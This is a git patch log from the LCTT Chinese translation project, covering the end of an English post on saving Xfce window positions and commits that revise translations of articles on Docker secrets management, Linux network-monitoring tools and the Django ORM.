Ubuntu, Xfce, and Red Hat bug trackers), and there was apparently a related bug fixed in Xfce 4.10, but I'm using 4.12. I would have given up (and have several times in the past), except that on one of my systems this works correctly. All the windows go back to their proper positions. + +Today, I dug into the difference and finally solved it. Here it is, in case someone else stumbles across it. + +Some up-front caveats that are or may be related: + + 1. I rarely log out of my Xfce session, since this is a single-user laptop. I hibernate and keep restoring until I decide to do a reboot for kernel patches, or (and this is somewhat more likely) some change to the system invalidates the hibernate image and the system hangs on restore from hibernate and I force-reboot it. I also only sometimes use the Xfce toolbar to do a reboot; often, I just run `reboot`. + + 2. I use xterm and Emacs, which are not horribly sophisticated X applications and which don't remember their own window positioning. + + + + +Xfce stores sessions in `.cache/sessions` in your home directory. The key discovery on close inspection is that there were two types of files in that directory on the working system, and only one on the non-working system. + +The typical file will have a name like `xfce4-session-hostname:0` and contains things like: +``` +Client9_ClientId=2a654109b-e4d0-40e4-a910-e58717faa80b +Client9_Hostname=local/hostname +Client9_CloneCommand=xterm +Client9_RestartCommand=xterm,-xtsessionID,2a654109b-e4d0-40e4-a910-e58717faa80b +Client9_Program=xterm +Client9_UserId=user + +``` + +This is the file that remembers all of the running applications. If you go into Settings -> Session and Startup and clear the session cache, files like this will be deleted. If you save your current session, a file like this will be created. This is how Xfce knows to start all of the same applications. But notice that nothing in the above preserves the positioning of the window. (I went down a rabbit hole thinking the session ID was somehow linking to that information elsewhere, but it's not.) + +The working system had a second type of file in that directory named `xfwm4-2d4c9d4cb-5f6b-41b4-b9d7-5cf7ac3d7e49.state`. Looking in that file reveals entries like: +``` +[CLIENT] 0x200000f + [CLIENT_ID] 2a9e5b8ed-1851-4c11-82cf-e51710dcf733 + [CLIENT_LEADER] 0x200000f + [RES_NAME] xterm + [RES_CLASS] XTerm + [WM_NAME] xterm + [WM_COMMAND] (1) "xterm" + [GEOMETRY] (860,35,817,1042) + [GEOMETRY-MAXIMIZED] (860,35,817,1042) + [SCREEN] 0 + [DESK] 2 + [FLAGS] 0x0 + +``` + +Notice the geometry and desk, which are exactly what we're looking for: the window location and the workspace it should be on. So the problem with window position not being saved was the absence of this file. + +After some more digging, I discovered that while the first file is saved when you explicitly save your session, the second is not. However, it is saved on logout. So, I went to Settings -> Session and Startup and enabled automatically save session on logout in the General tab, logged out and back in again, and tada, the second file appeared. I then turned saving off again (since I set up my screens and then save them and don't want any subsequent changes saved unless I do so explicitly), and now my window position is reliably restored. + +This also explains why some people see this and others don't: some people probably regularly use the Log Out button, and others ignore it and manually reboot (or just have their system crash). + +Incidentally, this sort of problem, and the amount of digging that I had to do to solve it, is the reason why I'm in favor of writing man pages or some other documentation for every state file your software stores. Not only does it help people digging into weird problems, it helps you as the software author notice surprising oddities, like splitting session state across two separate state files, when you go to document them for the user. + + +-------------------------------------------------------------------------------- + +via: https://www.eyrie.org/~eagle/journal/2017-12/001.html + +作者:[J. R. R. Tolkien][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.eyrie.org From b45387621e41920250e91ff39ea1bdf822117927 Mon Sep 17 00:00:00 2001 From: darksun Date: Sun, 17 Dec 2017 13:41:04 +0800 Subject: [PATCH 0652/1627] rename --- ...-12-16).md => 20171216 Saving window position in Xfce session} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename sources/tech/{20171216 Eagle's Path: (2017-12-16).md => 20171216 Saving window position in Xfce session} (100%) diff --git a/sources/tech/20171216 Eagle's Path: (2017-12-16).md b/sources/tech/20171216 Saving window position in Xfce session similarity index 100% rename from sources/tech/20171216 Eagle's Path: (2017-12-16).md rename to sources/tech/20171216 Saving window position in Xfce session From 31646ab8ecc80a089608d04fefa7acf3a61cbce7 Mon Sep 17 00:00:00 2001 From: darksun Date: Sun, 17 Dec 2017 13:42:01 +0800 Subject: [PATCH 0653/1627] rename --- ...session => 20171216 Saving window position in Xfce session.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename sources/tech/{20171216 Saving window position in Xfce session => 20171216 Saving window position in Xfce session.md} (100%) diff --git a/sources/tech/20171216 Saving window position in Xfce session b/sources/tech/20171216 Saving window position in Xfce session.md similarity index 100% rename from sources/tech/20171216 Saving window position in Xfce session rename to sources/tech/20171216 Saving window position in Xfce session.md From d4a4bb550889e23d71303a6ed826a6a172af90de Mon Sep 17 00:00:00 2001 From: darksun Date: Sun, 17 Dec 2017 13:42:24 +0800 Subject: [PATCH 0654/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2017=E6=97=A5=20=E6=98=9F=E6=9C=9F=E6=97=A5=2013:42:2?= =?UTF-8?q?4=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- sources/tech/.#20171216 Saving window position in Xfce session | 1 + 1 file changed, 1 insertion(+) create mode 120000 sources/tech/.#20171216 Saving window position in Xfce session diff --git a/sources/tech/.#20171216 Saving window position in Xfce session b/sources/tech/.#20171216 Saving window position in Xfce session new file mode 120000 index 0000000000..c7faaea5e7 --- /dev/null +++ b/sources/tech/.#20171216 Saving window position in Xfce session @@ -0,0 +1 @@ +lujun9972@T520.907:1513464785 \ No newline at end of file From 016f5bbc379bf216a215f84edca1eee351d40217 Mon Sep 17 00:00:00 2001 From: darksun Date: Sun, 17 Dec 2017 13:44:55 +0800 Subject: [PATCH 0655/1627] remove useless file --- sources/tech/.#20171216 Saving window position in Xfce session | 1 - 1 file changed, 1 deletion(-) delete mode 120000 sources/tech/.#20171216 Saving window position in Xfce session diff --git a/sources/tech/.#20171216 Saving window position in Xfce session b/sources/tech/.#20171216 Saving window position in Xfce session deleted file mode 120000 index c7faaea5e7..0000000000 --- a/sources/tech/.#20171216 Saving window position in Xfce session +++ /dev/null @@ -1 +0,0 @@ -lujun9972@T520.907:1513464785 \ No newline at end of file From ac7e0d02916bbb0a35de759e5da9565bb3836bd6 Mon Sep 17 00:00:00 2001 From: TRsky <625310581@qq.com> Date: Sun, 17 Dec 2017 14:44:07 +0800 Subject: [PATCH 0656/1627] update --- ...9 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 39 +++++++------------ 1 file changed, 15 insertions(+), 24 deletions(-) diff --git a/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md index a9731b32ec..6e12b71fd3 100644 --- a/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md +++ b/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md @@ -1,11 +1,3 @@ -<<<<<<< HEAD -======= - -translating by HardworkFish - -INTRODUCING DOCKER SECRETS MANAGEMENT -============================================================ ->>>>>>> 7162ea6a1c215c9d3bafdc90adc5cb9fdbdfa989 Dockers Secrets 管理介绍 ========================= @@ -20,11 +12,13 @@ Dockers Secrets 管理介绍 ### Docker Secerts 管理介绍 -根本上我们认为,如果有一个标准的接口来访问secrets,应用程序就更安全了。任何好的解决方案也必须遵循安全性实践,例如在传输的过程中,对secrets进行加密;在休息的时候对secrets进行加密;防止无意中泄露最终应用所消耗的secrets;并严格遵守最小特权原则即应用程序只能访问所需的secrets,不能多也不能不少。通过将secrets整合向docker的业务流程,我们能够在遵循这些确切的原则下为secrets管理问题提供一种解决方案。 +根本上我们认为,如果有一个标准的接口来访问secrets,应用程序就更安全了。任何好的解决方案也必须遵循安全性实践,例如在传输的过程中,对secrets进行加密;在休息的时候对secrets进行加密;防止无意中泄露最终应用所消耗的secrets;并严格遵守最小特权原则即应用程序只能访问所需的secrets,不能多也不能不少。 + +通过将secrets整合向docker的业务流程,我们能够在遵循这些确切的原则下为secrets管理问题提供一种解决方案。 下图提供了一个高层次视图,并展示了Docker swarm mode结构是如何将一种新类型的对象安全地传递给我们的容器:一个secret对象。 -![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1) + ![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1) 在Docker中,一个secret是任意的数据块,比如密码、SSH 密钥、TLS凭证,或者对自然界敏感的每一块数据。当你将一个secret加入swarm(通过执行`docker secret create`)时,docker利用在引导一个新的swarm时自动创建的内置的证书权威,通过相互认证的TLS连接把secret交给swarm管理。 @@ -37,16 +31,13 @@ $ echo "This is a secret" | docker secret create my_secret_data - 当 swarm 管理器启动的时,包含secrets的被加密过的Raft日志通过每一个节点唯一的数据密钥进行解密。此密钥和用于与集群其余部分通信的节点的TLS凭据可以使用一个集群范围的密钥加密密钥进行加密,该密钥称为“解锁密钥”,还使用Raft进行传播,将且会在管理器启动的时候被要求。 -当授予新创建或运行的服务访问某个secret时,管理器节的其中一个节点(只有管理人员可以访问被存储的所有存储secrets),将已建立的TLS连接发送给正在运行特定服务的节点。这意味着节点自己不能请求secrets,并且只有在管理员提供给他们的secrets时才能访问这些secrets——严格地要求那些需要他们的服务。 - - -如果一个服务被删除了,或者被重新安排在其他地方,管理员能够很快的注意到那些不再需要访问将它从内存中消除的secret 的所有节点,且那节点将不能够访问应用程序的secret。 +当授予新创建或运行的服务访问某个secret时,管理器节的其中一个节点(只有管理人员可以访问被存储的所有存储secrets),将已建立的TLS连接发送给正在运行特定服务的节点。这意味着节点自己不能请求secrets,并且只有在管理员提供给他们的secrets时才能访问这些secrets——严格地要求那些需要他们的服务。如果一个服务被删除了,或者被重新安排在其他地方,管理员能够很快的注意到那些不再需要访问将它从内存中消除的secret 的所有节点,且那节点将不能够访问应用程序的secret。 ``` $ docker service  create --name="redis" --secret="my_secret_data" redis:alpine ``` -The  unencrypted secret is mounted into the container in an in-memory filesystem at /run/secrets/. +未加密的 secret 被安装到 /run/secrests/ 内存文件系统的容器中 ``` $ docker exec $(docker ps --filter name=redis -q) ls -l /run/secrets @@ -54,7 +45,7 @@ total 4 -r--r--r--    1 root     root            17 Dec 13 22:48 my_secret_data ``` -If a service gets deleted, or rescheduled somewhere else, the manager will immediately notify all the nodes that no longer require access to that secret to erase it from memory, and the node will no longer have any access to that application secret. +如果一个服务被删除了,或者被重新安排在其他地方,管理员能够很快的注意到那些不再需要访问将它从内存中消除的secret 的所有节点,且那节点将不能够访问应用程序的secret。 ``` $ docker service update --secret-rm="my_secret_data" redis @@ -73,21 +64,21 @@ cat: can't open '/run/secrets/my_secret_data': No such file or directory ### ![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/Screenshot-2017-02-08-23.30.13.png?resize=1032%2C111&ssl=1) -### Safer Apps with Docker +### 通过 Docker 更安全地使用应用程序 -Docker secrets 为开发者设计成更易于使用且IT 运维团队用它来构建和运行更加安全的运用程序。Docker secrets 是首个被设计为既能保持secret安全又能仅在当被需要secret操作的确切容器需要的使用的容器结构。从通过直接在Docker 数据中心开发部件文件的IT管理员并使用Docker 组件来定义应用程序和secrets 来看,服务器、secrets、网络和volumes将能够安全可靠地使用应用程序。 +Docker secrets 为开发者设计成更易于使用且IT 运维团队用它来构建和运行更加安全的运用程序。Docker secrets 是首个被设计为既能保持secret安全又能仅在当被需要secret操作的确切容器需要的使用的容器结构。从通过直接在 Docker 数据中心开发部件文件的IT管理员并使用 Docker 组件来定义应用程序和secrets 来看,服务器、secrets、网络和 volumes 将能够安全可靠地使用应用程序。 -Resources to learn more: +更多相关学习资源: -* [Docker Datacenter on 1.13 with Secrets, Security Scanning, Content Cache and More][7] +* [1.13 Docker 数据中心具有 Secrets, 安全扫描、容量缓存等新特性][7] -* [Download Docker][8] and get started today +* [下载 Docker ][8] 且开始学习 -* [Try secrets in Docker Datacenter][9] +* [在 Docker 数据中心尝试使用 secrets][9] -* [Read the Documentation][10] +* [阅读文档][10] -* Attend an [upcoming webinar][11] +* 参与 [即将进行的在线研讨会][11] -------------------------------------------------------------------------------- From 804b1ba2a952a8bd9741d41811d58e224d1d0131 Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 17 Dec 2017 18:06:29 +0800 Subject: [PATCH 0657/1627] PRF&PUB:20171203 Best Network Monitoring Tools For Linux.md @qhwdw https://linux.cn/article-9153-1.html --- ...Best Network Monitoring Tools For Linux.md | 129 ++++++++++++++++++ ...Best Network Monitoring Tools For Linux.md | 127 ----------------- 2 files changed, 129 insertions(+), 127 deletions(-) create mode 100644 published/20171203 Best Network Monitoring Tools For Linux.md delete mode 100644 translated/tech/20171203 Best Network Monitoring Tools For Linux.md diff --git a/published/20171203 Best Network Monitoring Tools For Linux.md b/published/20171203 Best Network Monitoring Tools For Linux.md new file mode 100644 index 0000000000..76a8cb829f --- /dev/null +++ b/published/20171203 Best Network Monitoring Tools For Linux.md @@ -0,0 +1,129 @@ +十个不错的 Linux 网络监视工具 +=============================== + +![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/best-network-monitoring-tools_orig.jpg) + +保持对我们的网络的管理,防止任何程序过度使用网络、导致整个系统操作变慢,对管理员来说是至关重要的。有几个网络监视工具可以用于不同的操作系统。在这篇文章中,我们将讨论从 Linux 终端中运行的 10 个网络监视工具。它对不使用 GUI 而希望通过 SSH 来保持对网络管理的用户来说是非常理想的。 + +### iftop + +[![iftop network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png)][2] + +Linux 用户通常都熟悉 `top` —— 这是一个系统监视工具,它允许我们知道在我们的系统中实时运行的进程,并可以很容易地管理它们。`iftop` 与 `top` 应用程序类似,但它是专门监视网络的,通过它可以知道更多的关于网络的详细情况和使用网络的所有进程。 + +我们可以从 [这个链接][3] 获取关于这个工具的更多信息以及下载必要的包。 + +### vnstat + +[![vnstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/vnstat.png?1511885309)][4] + +`vnstat` 是一个缺省包含在大多数 Linux 发行版中的网络监视工具。它允许我们对一个用户选择的时间周期内发送和接收的流量进行实时控制。 + +我们可以从 [这个链接][5] 获取关于这个工具的更多信息以及下载必要的包。 + +### iptraf + +[![iptraf monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif)][6] + +IPTraf 是一个基于控制台的 Linux 实时网络监视程序。它会收集经过这个网络的各种各样的信息作为一个 IP 流量监视器,包括 TCP 标志信息、ICMP 详细情况、TCP / UDP 流量故障、TCP 连接包和字节计数。它也收集接口上全部的 TCP、UDP、…… IP 协议和非 IP 协议 ICMP 的校验和错误、接口活动等等的详细情况。(LCTT 译注:此处原文有误,径改之) + +我们可以从 [这个链接][7] 获取这个工具的更多信息以及下载必要的包。 + +### Monitorix - 系统和网络监视 + + [![monitorix system monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png)][8] + +Monitorix 是一个轻量级的免费应用程序,它设计用于去监视尽可能多的 Linux / Unix 服务器的系统和网络资源。它里面添加了一个 HTTP web 服务器,可以定期去收集系统和网络信息,并且在一个图表中显示它们。它跟踪平均系统负载、内存分配、磁盘健康状态、系统服务、网络端口、邮件统计信息(Sendmail、Postfix、Dovecot 等等)、MySQL 统计信息以及其它的更多内容。它设计用于去管理系统的整体性能,以及帮助检测故障、瓶颈、异常活动等等。 + +下载及更多 [信息在这里][9]。 + +### dstat + +[![dstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png)][10] + +这个监视器相比前面的几个知名度低一些,但是,在一些发行版中已经缺省包含了。 + +我们可以从 [这个链接][11] 获取这个工具的更多信息以及下载必要的包。 + +### bwm-ng + +[![bwm-ng monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png)][12] + +这是最简化的工具之一。它允许你去从连接中交互式取得数据,并且,为了便于其它设备使用,在取得数据的同时,能以某些格式导出它们。 + +我们可以从 [这个链接][13] 获取这个工具的更多信息以及下载必要的包。 + +### ibmonitor + + [![ibmonitor tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg)][14] + +与上面的类似,它显示连接接口上过滤后的网络流量,并且,明确地将接收流量和发送流量区分开。 + +我们可以从 [这个链接][15] 获取这个工具的更多信息以及下载必要的包。 +​ +### Htop - Linux 进程跟踪 + +[![htop linux processes monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png)][16] + +Htop 是一个更先进的、交互式的、实时的 Linux 进程跟踪工具。它类似于 Linux 的 top 命令,但是有一些更高级的特性,比如,一个更易于使用的进程管理界面、快捷键、水平和垂直的进程视图等更多特性。Htop 是一个第三方工具,它不包含在 Linux 系统中,你必须使用 **YUM** 或者 **APT-GET** 或者其它的包管理工具去安装它。关于安装它的更多信息,读[这篇文章][17]。 + +我们可以从 [这个链接][18] 获取这个工具的更多信息以及下载必要的包。 + +### arpwatch - 以太网活动监视器 + +[![arpwatch ethernet monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png)][19] + +arpwatch 是一个设计用于在 Linux 网络中去管理以太网通讯的地址解析程序。它持续监视以太网通讯并记录一个网络中的 IP 地址和 MAC 地址的变化,该变化同时也会记录一个时间戳。它也有一个功能是当一对 IP 和 MAC 地址被添加或者发生变化时,发送一封邮件给系统管理员。在一个网络中发生 ARP 攻击时,这个功能非常有用。 + +我们可以从 [这个链接][20] 获取这个工具的更多信息以及下载必要的包。 + +### Wireshark - 网络监视工具 + + [![wireshark network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/how-to-use-wireshark_1.jpg?1512299583)][21] + +[Wireshark][1] 是一个自由的应用程序,它允许你去捕获和查看前往你的系统和从你的系统中返回的信息,它可以去深入到数据包中并查看每个包的内容 —— 以分别满足你的不同需求。它一般用于去研究协议问题和去创建和测试程序的特别情况。这个开源分析器是一个被公认的分析器商业标准,它的流行要归功于其久负盛名。 + +最初它被叫做 Ethereal,Wireshark 有轻量化的、易于理解的界面,它能分类显示来自不同的真实系统上的协议信息。 + +### 结论 + +​在这篇文章中,我们看了几个开源的网络监视工具。虽然我们从这些工具中挑选出来的认为是“最佳的”,并不意味着它们都是最适合你的需要的。例如,现在有很多的开源监视工具,比如,OpenNMS、Cacti、和 Zennos,并且,你需要去从你的个体情况考虑它们的每个工具的优势。 + +另外,还有不同的、更适合你的需要的不开源的工具。 + +你知道的或者使用的在 Linux 终端中的更多网络监视工具还有哪些? + +-------------------------------------------------------------------------------- + +via: http://www.linuxandubuntu.com/home/best-network-monitoring-tools-for-linux + +作者:[​​LinuxAndUbuntu][a] +译者:[qhwdw](https://github.com/qhwdw) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.linuxandubuntu.com +[1]:https://www.wireshark.org/ +[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png +[3]:http://www.ex-parrot.com/pdw/iftop/ +[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/vnstat.png +[5]:http://humdi.net/vnstat/ +[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif +[7]:http://iptraf.seul.org/ +[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png +[9]:http://www.monitorix.org +[10]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png +[11]:http://dag.wiee.rs/home-made/dstat/ +[12]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png +[13]:http://sourceforge.net/projects/bwmng/ +[14]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg +[15]:http://ibmonitor.sourceforge.net/ +[16]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png +[17]:http://wesharethis.com/knowledgebase/htop-and-atop/ +[18]:http://hisham.hm/htop/ +[19]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png +[20]:http://linux.softpedia.com/get/System/Monitoring/arpwatch-NG-7612.shtml +[21]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/how-to-use-wireshark_1_orig.jpg + + diff --git a/translated/tech/20171203 Best Network Monitoring Tools For Linux.md b/translated/tech/20171203 Best Network Monitoring Tools For Linux.md deleted file mode 100644 index 8fc2cd25e3..0000000000 --- a/translated/tech/20171203 Best Network Monitoring Tools For Linux.md +++ /dev/null @@ -1,127 +0,0 @@ -Linux 中最佳的网络监视工具 -=============================== - -保持对我们的网络的管理,防止任何程序过度使用网络、导致整个系统操作变慢,对管理员来说是至关重要的。对不同的系统操作,这是有几个网络监视工具。在这篇文章中,我们将讨论从 Linux 终端中运行的 10 个网络监视工具。它对不使用 GUI 而希望通过 SSH 来保持对网络管理的用户来说是非常理想的。 - -### Iftop - - [![iftop network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png)][2] - -与 Linux 用户经常使用的 Top 是非常类似的。这是一个系统监视工具,它允许我们知道在我们的系统中实时运行的进程,并可以很容易地管理它们。Iftop 与 Top 应用程序类似,但它是专门监视网络的,通过它可以知道更多的关于网络的详细情况和使用网络的所有进程。 - -我们可以从 [这个链接][3] 获取关于这个工具的更多信息以及下载必要的包。 - -### Vnstat - - [![vnstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/vnstat.png?1511885309)][4] - -**Vnstat** 是一个缺省包含在大多数 Linux 发行版中的网络监视工具。它允许我们在一个用户选择的时间周期内获取一个实时管理的发送和接收的流量。 - -我们可以从 [这个链接][5] 获取关于这个工具的更多信息以及下载必要的包。 - -### Iptraf - - [![iptraf monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif)][6] - -**IPTraf** 是一个 Linux 的、基于控制台的、实时网络监视程序。(IP LAN) - 收集经过这个网络的各种各样的信息作为一个 IP 流量监视器,包括 TCP 标志信息、ICMP 详细情况、TCP / UDP 流量故障、TCP 连接包和 Byne 报告。它也收集接口上全部的 TCP、UDP、…… 校验和错误、接口活动等等的详细情况。 - -我们可以从 [这个链接][7] 获取这个工具的更多信息以及下载必要的包。 - -### Monitorix - 系统和网络监视 - - [![monitorix system monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png)][8] - -Monitorix 是一个轻量级的免费应用程序,它设计用于去监视尽可能多的 Linux / Unix 服务器的系统和网络资源。一个 HTTP web 服务器可以被添加到它里面,定期去收集系统和网络信息,并且在一个图表中显示它们。它跟踪平均的系统负载、内存分配、磁盘健康状态、系统服务、网络端口、邮件统计信息(Sendmail、Postfix、Dovecot、等等)、MySQL 统计信息以及其它的更多内容。它设计用于去管理系统的整体性能,以及帮助检测故障、瓶颈、异常活动、等等。 - -下载及更多 [信息在这里][9]。 - -### Dstat - - [![dstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png)][10] - -这个监视器相比前面的几个知名度低一些,但是,在一些发行版中已经缺省包含了。 - -我们可以从 [这个链接][11] 获取这个工具的更多信息以及下载必要的包。 - -### Bwm-ng - - [![bwm-ng monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png)][12] - -这是最简化的工具中的一个。它允许你去从交互式连接中取得数据,并且,为了便于其它设备使用,在取得数据的同时,能以某些格式导出它们。 - -我们可以从 [这个链接][13] 获取这个工具的更多信息以及下载必要的包。 - -### Ibmonitor - - [![ibmonitor tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg)][14] - -与上面的类似,它显示连接接口上过滤后的网络流量,并且,从接收到的流量中明确地区分区开发送流量。 - -我们可以从 [这个链接][15] 获取这个工具的更多信息以及下载必要的包。 -​ -### Htop - Linux 进程跟踪 - - [![htop linux processes monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png)][16] - -Htop 是一个更高级的、交互式的、实时的 Linux 进程跟踪工具。它类似于 Linux 的 top 命令,但是有一些更高级的特性,比如,一个更易于使用的进程管理接口、快捷键、水平和垂直的进程视图、等更多特性。Htop 是一个第三方工具,它不包含在 Linux 系统中,你必须使用 **YUM** 或者 **APT-GET** 或者其它的包管理工具去安装它。关于安装它的更多信息,读[这篇文章][17]。 - -我们可以从 [这个链接][18] 获取这个工具的更多信息以及下载必要的包。 - -### Arpwatch - 以太网活动监视器 - - [![arpwatch ethernet monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png)][19] - -Arpwatch 是一个设计用于在 Linux 网络中去管理以太网通讯的地址解析的程序。它持续监视以太网通讯并记录 IP 地址和 MAC 地址的变化。在一个网络中,它们的变化同时伴随记录一个时间戳。它也有一个功能是当一对 IP 和 MAC 地址被添加或者发生变化时,发送一封邮件给系统管理员。在一个网络中发生 ARP 攻击时,这个功能非常有用。 - -我们可以从 [这个链接][20] 获取这个工具的更多信息以及下载必要的包。 - -### Wireshark - 网络监视工具 - - [![wireshark network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/how-to-use-wireshark_1.jpg?1512299583)][21] - -**[Wireshark][1]** 是一个免费的应用程序,它允许你去捕获和查看前往你的系统和从你的系统中返回的信息,它可以去深入到通讯包中并查看每个包的内容 – 分开它们来满足你的特殊需要。它一般用于去研究协议问题和去创建和测试程序的特别情况。这个开源分析器是一个被公认的分析器商业标准,它的流行是因为纪念那些年的荣誉。 - -最初它被认识是因为 Ethereal,Wireshark 有轻量化的、易于去理解的界面,它能分类显示来自不同的真实系统上的协议信息。 - -### 结论 - -​在这篇文章中,我们看了几个开源的网络监视工具。由于我们从这些工具中挑选出来的认为是“最佳的”,并不意味着它们都是最适合你的需要的。例如,现在有很多的开源监视工具,比如,OpenNMS、Cacti、和 Zennos,并且,你需要去从你的个体情况考虑它们的每个工具的优势。 - -另外,还有不同的、更适合你的需要的不开源的工具。 - -你知道的或者使用的在 Linux 终端中的更多网络监视工具还有哪些? - --------------------------------------------------------------------------------- - -via: http://www.linuxandubuntu.com/home/best-network-monitoring-tools-for-linux - -作者:[​​LinuxAndUbuntu][a] -译者:[qhwdw](https://github.com/qhwdw) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://www.linuxandubuntu.com -[1]:https://www.wireshark.org/ -[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png -[3]:http://www.ex-parrot.com/pdw/iftop/ -[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/vnstat.png -[5]:http://humdi.net/vnstat/ -[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif -[7]:http://iptraf.seul.org/ -[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png -[9]:http://www.monitorix.org -[10]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png -[11]:http://dag.wiee.rs/home-made/dstat/ -[12]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png -[13]:http://sourceforge.net/projects/bwmng/ -[14]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg -[15]:http://ibmonitor.sourceforge.net/ -[16]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png -[17]:http://wesharethis.com/knowledgebase/htop-and-atop/ -[18]:http://hisham.hm/htop/ -[19]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png -[20]:http://linux.softpedia.com/get/System/Monitoring/arpwatch-NG-7612.shtml -[21]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/how-to-use-wireshark_1_orig.jpg - - From b9f83c7c48334261e7a36fafb2632c22c47c2966 Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 17 Dec 2017 18:52:57 +0800 Subject: [PATCH 0658/1627] PRF:20171124 An introduction to the Django ORM.md @qhwdw --- ...71124 An introduction to the Django ORM.md | 62 +++++++------------ 1 file changed, 24 insertions(+), 38 deletions(-) diff --git a/translated/tech/20171124 An introduction to the Django ORM.md b/translated/tech/20171124 An introduction to the Django ORM.md index 789640441b..5fd64fff94 100644 --- a/translated/tech/20171124 An introduction to the Django ORM.md +++ b/translated/tech/20171124 An introduction to the Django ORM.md @@ -1,19 +1,19 @@ Django ORM 简介 ============================================================ -### 学习怎么去使用 Python 的 web 框架中的对象关系映射与你的数据库交互,就像你使用 SQL 一样。 +> 学习怎么去使用 Python 的 web 框架中的对象关系映射与你的数据库交互,就像你使用 SQL 一样。 ![Getting to know the Django ORM](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/web-spider-frame-framework.png?itok=Rl2AG2Dc "Getting to know the Django ORM") -Image by : [Christian Holmér][10]. Modified by Opensource.com. [CC BY-SA 4.0][11] + 你可能听说过 [Django][12],它是一个被称为“完美主义者的最后期限” 的 Python web 框架。它是一匹 [可爱的小矮马][13]。 -Django 的其中一个强大的功能是它的对象关系映射(ORM),它允许你去和你的数据库交互,就像你使用 SQL 一样。事实上,Django 的 ORM 就是创建 SQL 去查询和维护数据库的一个 Python 的方法,并且在一个 Python 方法中获取结果。 我说 _就是_ 一种方法,但实际上,它是一项非常聪明的工程,它利用了 